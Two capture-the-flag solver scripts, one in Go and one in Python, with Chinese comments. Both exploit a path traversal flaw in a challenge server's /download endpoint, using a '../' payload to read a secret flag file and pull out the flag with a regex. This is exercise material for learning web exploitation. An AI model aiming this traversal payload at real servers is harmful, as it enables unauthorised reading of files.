File: CTF_Writeups/scripts_go/NovruzCTF_python-serverl.go
// =============================================================================
// 题目名称: File Server
// 题目类别: Web - 路径遍历 (Path Traversal)
// 解题思路: 下载接口未过滤 ../，通过路径遍历读取
//
//	/home/system_admin/secret_flag.txt
//
// 用法: go run NovruzCTF_python-serverl.go [目标地址]
//
//	示例: go run NovruzCTF_python-serverl.go https://58538afc0c.chall.canyouhack.org
//
// =============================================================================
package main

import (
	"fmt"
	"io"
	"net/http"
	"net/url"
	"os"
	"regexp"
)

const defaultBaseURL = "https://58538afc0c.chall.canyouhack.org"

func main() {
	base := defaultBaseURL
	if len(os.Args) > 1 {
		base = os.Args[1]
	}

	path := "../../../../../home/system_admin/secret_flag.txt"
	u := base + "/download?file=" + url.QueryEscape(path)

	resp, err := http.Get(u)
	if err != nil {
		fmt.Fprintf(os.Stderr, "[!] 请求失败: %v\n", err)
		os.Exit(1)
	}
	defer resp.Body.Close()
	body, _ := io.ReadAll(resp.Body)

	re := regexp.MustCompile(`novruzCTF\{[^}]+\}`)
	m := re.Find(body)
	if m == nil {
		fmt.Fprintln(os.Stderr, "[!] 未找到 flag，响应内容:")
		fmt.Println(string(body))
		os.Exit(1)
	}
	fmt.Println(string(m))
}

File: CTF_Writeups/scripts_python/NovruzCTF_python-serverl.py
#!/usr/bin/env python3
"""
题目名称: File Server
类别: Web (路径穿越)
解题思路:
    1. /download 接口的 file 参数存在路径穿越漏洞
    2. 通过 ../ 跳转到 /home/system_admin/secret_flag.txt 读取 flag
"""

import re
import sys

import requests

# 目标地址（可通过命令行参数覆盖）
TARGET_BASE = "https://58538afc0c.chall.canyouhack.org"
# 穿越路径
TRAVERSAL_PATH = "../../../../../home/system_admin/secret_flag.txt"
# flag 正则匹配
FLAG_PATTERN = r"novruzCTF\{[^}]+\}"


def exploit(base_url: str = TARGET_BASE) -> str:
    """利用路径穿越漏洞读取 flag"""
    resp = requests.get(f"{base_url}/download", params={"file": TRAVERSAL_PATH}, timeout=10)
    match = re.search(FLAG_PATTERN, resp.text)
    return match.group(0) if match else f"未找到 flag，响应内容:\n{resp.text[:500]}"


if __name__ == "__main__":
    url = sys.argv[1] if len(sys.argv) > 1 else TARGET_BASE
    try:
        result = exploit(url)
        print(result)
    except requests.RequestException as e:
        print(f"[!] 请求失败: {e}", file=sys.stderr)
        sys.exit(1)
